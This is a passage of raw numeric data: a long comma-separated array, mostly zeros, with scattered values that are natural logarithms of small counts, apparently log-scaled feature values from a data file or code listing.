0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.9512437185814275, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0, 0,\n 0, 3.1354942159291497, 3.800574088041945, 0, 0.0, 0.0, 0.0, 0, \n 4.969640753475787, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 4.631631038266565, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 3.3322045101752034, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.367295829986474, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 5.41610040220442, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, \n 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216,\n 0, 0.0, 0, 3.58351893845611, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 2.302585092994046, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.553876891600541, 0, 0.0, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.800574088041945, 0,\n 0.0, 0, 0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 3.6635616461296467, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.4825185607408002, 0, 0, 0.0, 5.204006687076795, 0.0, 0.0, \n 8.61362370353681, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 2.4849066497880004, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.7412592803704001, 0, 0.0, 0, 2.550898738446989, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.44274094706523, 5.679743138077019, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 1.7412592803704001, 0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 